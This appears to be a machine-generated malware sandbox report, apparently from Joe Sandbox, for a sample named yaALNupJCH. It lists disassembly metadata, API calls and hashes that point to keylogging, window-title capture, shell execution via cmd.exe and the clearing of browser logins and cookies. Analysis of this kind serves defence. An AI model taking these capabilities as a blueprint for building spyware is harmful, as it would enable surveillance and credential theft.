                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: /C $cmd.exe$open
                                                                                                • API String ID: 587946157-3896048727
                                                                                                • Opcode ID: 610f9d4ab85ed9ed832b0f828398e7d329f4f9d56a6ab645d364716947e3a920
                                                                                                • Instruction ID: bc4dd6aa4ab558d655425de935e10167e04fb3070ff3751930c06e50bc580138
                                                                                                • Opcode Fuzzy Hash: 610f9d4ab85ed9ed832b0f828398e7d329f4f9d56a6ab645d364716947e3a920
                                                                                                • Instruction Fuzzy Hash: 0FE0C0B0208305AAC605E775CC95CBF73ADAA94749B50483F7142A21E2EF7C9D49C659
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D006,004752D8,004752F0,?,pth_unenc), ref: 0040B809
                                                                                                • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B815
                                                                                                • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B823
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3123878439-4028850238
                                                                                                • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                                                • Instruction ID: 7225ec322da407d72c5b2b1858536f2023f8fa499673018caf64050c5ea1622b
                                                                                                • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                                                • Instruction Fuzzy Hash: 14E01272205356EFD7241FA09C88C267AEEDA5479A724087EF2C3526A1CA794C10CB9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                                • API String ID: 1646373207-2714051624
                                                                                                • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                                                • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                                                                • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                                                • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                                • API String ID: 2574300362-1519888992
                                                                                                • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                                                • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                                                                • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                                                • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 3213747228-0
                                                                                                • Opcode ID: a6b94c66f384b87350474e45a72df701c63bd39e2c407c1191826adeddd11952
                                                                                                • Instruction ID: 0bf8f05058927b39290233d270046819688167186ddedb903eaacdc1ff971e27
                                                                                                • Opcode Fuzzy Hash: a6b94c66f384b87350474e45a72df701c63bd39e2c407c1191826adeddd11952
                                                                                                • Instruction Fuzzy Hash: 94B144729006459FDB118FA8C892FBEBBF5EF45340F1841AEE861DB241D7359E02CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: fbb6a2cd6f9bf6d969b44a73e529f1d3b5c9d8165b987cb2c487aba83d58bdfa
                                                                                                • Instruction ID: 1c99c1baa2c1a51b22a7fec4170ab91f976f64832bd9cd75480204965eff695a
                                                                                                • Opcode Fuzzy Hash: fbb6a2cd6f9bf6d969b44a73e529f1d3b5c9d8165b987cb2c487aba83d58bdfa
                                                                                                • Instruction Fuzzy Hash: 49A14532A442869FFB21CF18C8817ABBBA5EF15314F18416FE8859B382C23C8D55C75A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3922dfdde3da41f612c260adee25e1231fae8644cd662a269f658c2521a05857
                                                                                                • Instruction ID: 12dd57daedb0993c31d11761ead554a6d707fc71ddc44943b25e681bc7d43a46
                                                                                                • Opcode Fuzzy Hash: 3922dfdde3da41f612c260adee25e1231fae8644cd662a269f658c2521a05857
                                                                                                • Instruction Fuzzy Hash: 24717831E051845BDF24EF69EC8A7ED77A1EB46320F540299EC0087383EB759E8487D2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 33da098cc60deeed093464b680477ce6b92a1a60bdc287e57d9570303dc7c70e
                                                                                                • Instruction ID: e3068bce613121f7da0e89462de2b1c1cd52f701d27a7b22a158919516451886
                                                                                                • Opcode Fuzzy Hash: 33da098cc60deeed093464b680477ce6b92a1a60bdc287e57d9570303dc7c70e
                                                                                                • Instruction Fuzzy Hash: 73416E31A001006BEB226F7A8C4576F36A4EF41336F56021FFC58D7293DA7D88454A6E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetVersionExW.KERNEL32(0000011C), ref: 00CB4766
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00CB47C5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00CB47CC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProcVersion
                                                                                                • String ID:
                                                                                                • API String ID: 3310240892-0
                                                                                                • Opcode ID: b3cd067ea7a358939f7a5d29efe7032ea9a0089c2f2a117f1ecb39d6b9edf937
                                                                                                • Instruction ID: 8d1c8caa6e2a4c8f70d8fc5c8f5417e784808d80fc66e42f43e1379c7acc72c9
                                                                                                • Opcode Fuzzy Hash: b3cd067ea7a358939f7a5d29efe7032ea9a0089c2f2a117f1ecb39d6b9edf937
                                                                                                • Instruction Fuzzy Hash: 01416831D142589BDB18AB68DC4ABDDBB75EF41314F404269EC00E72D2EB369A80C7D2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                • Instruction ID: e5160d508a83ee6b7869f395aed11d8c970f4fa8f11d615d3853c79058a8dc25
                                                                                                • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                                • Instruction Fuzzy Hash: F8411B71A00708BFE724AF79CD41B6ABBE8EB84714F50862FF501DB2C1D7B999418B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00CD29FE
                                                                                                • _free.LIBCMT ref: 00CD2A27
                                                                                                • SetEndOfFile.KERNEL32(00000000,00CCE60E,00000000,00CC87EE,?,?,?,?,?,?,?,00CCE60E,00CC87EE,00000000), ref: 00CD2A59
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00CCE60E,00CC87EE,00000000,?,?,?,?,00000000), ref: 00CD2A75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFileLast
                                                                                                • String ID:
                                                                                                • API String ID: 1547350101-0
                                                                                                • Opcode ID: 9bf6ae2f23abfaaab2bbdb313ec24652a99e24453ef88d16f0af34fb7615d900
                                                                                                • Instruction ID: 7867067bb0d2a13ad74349d17a490d27aad403386dc6117c46114e9cae82ce35
                                                                                                • Opcode Fuzzy Hash: 9bf6ae2f23abfaaab2bbdb313ec24652a99e24453ef88d16f0af34fb7615d900
                                                                                                • Instruction Fuzzy Hash: DB41F632900645ABDB21ABA9CC42F9E7775EF58370F240516F628E73A1EA31DD41B721
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • Cleared browsers logins and cookies., xrefs: 0040C043
                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C032
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                • API String ID: 3472027048-1236744412
                                                                                                • Opcode ID: 669e323831cdddd66562449176982fab7b8ad7f083fc91f7ced72f2e2ccb54a5
                                                                                                • Instruction ID: cc9ddbdf17d26b75090e7d6a2d5a8c34be93039c878197950bbada9121290459
                                                                                                • Opcode Fuzzy Hash: 669e323831cdddd66562449176982fab7b8ad7f083fc91f7ced72f2e2ccb54a5
                                                                                                • Instruction Fuzzy Hash: B431C4143483826ED6116B7558567AB7B828E53754F0844BFB8C46B3C3DA7E48488BEF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CC4F1F: _free.LIBCMT ref: 00CC4F2D
                                                                                                  • Part of subcall function 00CCC8A4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00CD24A0,?,00000000,00000000), ref: 00CCC946
                                                                                                • GetLastError.KERNEL32 ref: 00CCB935
                                                                                                • __dosmaperr.LIBCMT ref: 00CCB93C
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00CCB97B
                                                                                                • __dosmaperr.LIBCMT ref: 00CCB982
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                • String ID:
                                                                                                • API String ID: 167067550-0
                                                                                                • Opcode ID: 78ed4a0b0d8af5ff852bb99efb4dfc744e62e90c56144c188e5725423c0dc88e
                                                                                                • Instruction ID: 37deb0d49f98746df2da3ad3a675ffd31fb363036b326d085692d6b80533dc44
                                                                                                • Opcode Fuzzy Hash: 78ed4a0b0d8af5ff852bb99efb4dfc744e62e90c56144c188e5725423c0dc88e
                                                                                                • Instruction Fuzzy Hash: 5D21B371A00615AF9B206FE6CC82F6BB7ACEF44364F14852CFA6D97191D734ED4097A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6e4865f2e4a3e4d4d9e688a629bbe3fb5841a3993a720a0176f71a5259660055
                                                                                                • Instruction ID: aee02ef49978014f96827d0d0bf376534454e40adbe585ea3c207807a657c3a7
                                                                                                • Opcode Fuzzy Hash: 6e4865f2e4a3e4d4d9e688a629bbe3fb5841a3993a720a0176f71a5259660055
                                                                                                • Instruction Fuzzy Hash: 39219D71604209EFDB20AFA1DC81F2B77ADEF443A8B10452CF92996291E731ED419BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,00CC4E9D,?,?,?,?,00CC596B,?), ref: 00CC9247
                                                                                                • _free.LIBCMT ref: 00CC92A4
                                                                                                • _free.LIBCMT ref: 00CC92DA
                                                                                                • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,?,00CC4E9D,?,?,?,?,00CC596B,?), ref: 00CC92E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_free
                                                                                                • String ID:
                                                                                                • API String ID: 2283115069-0
                                                                                                • Opcode ID: d44f88146c60e780c9769fd47ecb1146110c5416159941cc49c995e55ea3ec5b
                                                                                                • Instruction ID: 4dc4d1f31a5ef86c69f504da09f09ae0e0bf13bf42f09289aba4e93cada2ac00
                                                                                                • Opcode Fuzzy Hash: d44f88146c60e780c9769fd47ecb1146110c5416159941cc49c995e55ea3ec5b
                                                                                                • Instruction Fuzzy Hash: A511C632205141BA9B107AB5DCCFF7F3159DBC2775B25022DF539971D2EE318D056210
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041C49F: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C4AF
                                                                                                  • Part of subcall function 0041C49F: GetWindowTextLengthW.USER32(00000000), ref: 0041C4B8
                                                                                                  • Part of subcall function 0041C49F: GetWindowTextW.USER32 ref: 0041C4E2
                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A4C1
                                                                                                • Sleep.KERNEL32(00000064), ref: 0040A54B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                • String ID: [ $ ]
                                                                                                • API String ID: 3309952895-93608704
                                                                                                • Opcode ID: e26e369cf829a5693ea69bcd5f2ff19f0489d143354a02a2f8d2dfb362c33519
                                                                                                • Instruction ID: 673b891c05171ccbd57fb692160b55fa7372551b064b24c29e954696105cbb10
                                                                                                • Opcode Fuzzy Hash: e26e369cf829a5693ea69bcd5f2ff19f0489d143354a02a2f8d2dfb362c33519
                                                                                                • Instruction Fuzzy Hash: 68119D315043006BC614FB26DC179AFB7A8AF90318F40053FF656665E2FF79AA18869B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,00CC5905,00CC8977,?,?,00CC7A83), ref: 00CC939E
                                                                                                • _free.LIBCMT ref: 00CC93FB
                                                                                                • _free.LIBCMT ref: 00CC9431
                                                                                                • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,?,00CC5905,00CC8977,?,?,00CC7A83), ref: 00CC943C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_free
                                                                                                • String ID:
                                                                                                • API String ID: 2283115069-0
                                                                                                • Opcode ID: 7e9a8043e783d25f64b019fb064729b9b22dbdf95fb958d635bc6038c2ac2da4
                                                                                                • Instruction ID: 19b910c46aa5345445a8dd60fe0273e068394b7b32330024d0a1b7aacaed66e9
                                                                                                • Opcode Fuzzy Hash: 7e9a8043e783d25f64b019fb064729b9b22dbdf95fb958d635bc6038c2ac2da4
                                                                                                • Instruction Fuzzy Hash: D511E532605582AA96107A75ECCFF7F2559DBC1774B29022CF538971E1EF318D066220
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 639b9409e2fb930854833158115cd827a0c242071936a85f60160cf34ce6723c
                                                                                                • Instruction ID: 54c03e9ce3202a4369395dee973575ff668b27e25674208517661f9046cc78fb
                                                                                                • Opcode Fuzzy Hash: 639b9409e2fb930854833158115cd827a0c242071936a85f60160cf34ce6723c
                                                                                                • Instruction Fuzzy Hash: C901F2B22093067EFA202E792CC5F67271CCF41BBAB31032BF421612C1EAA8CD00416D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4348ab701141db2ee471a76f6354be3bba6a68761b83c07e18708a65b4a21837
                                                                                                • Instruction ID: ee859d392e96439f373780085e5d4acac94642adf9cf6752a144726972cbb9ce
                                                                                                • Opcode Fuzzy Hash: 4348ab701141db2ee471a76f6354be3bba6a68761b83c07e18708a65b4a21837
                                                                                                • Instruction Fuzzy Hash: 8901D1B26096167EBA205EB97CC5D27A24DDF41BBA331033BF821B12E1DB28CD014169
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004483CD,00000000,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue), ref: 00448458
                                                                                                • GetLastError.KERNEL32(?,004483CD,00000000,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004481A7), ref: 00448464
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004483CD,00000000,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 00448472
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                                • Instruction ID: 41fac99623056356db925a1322829ea0c7156d24612c337f6d29b46335df47c5
                                                                                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                                                • Instruction Fuzzy Hash: 1301FC32602327EBD7218B789C4495B7B58BF05B61B214639FD09D3241EF28DD01C6D8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C400
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C425
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C433
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 3919263394-0
                                                                                                • Opcode ID: 7d1abebc12fc94ec9a74679c21743bb31c0bab12d6289aad5436d2a906a43a00
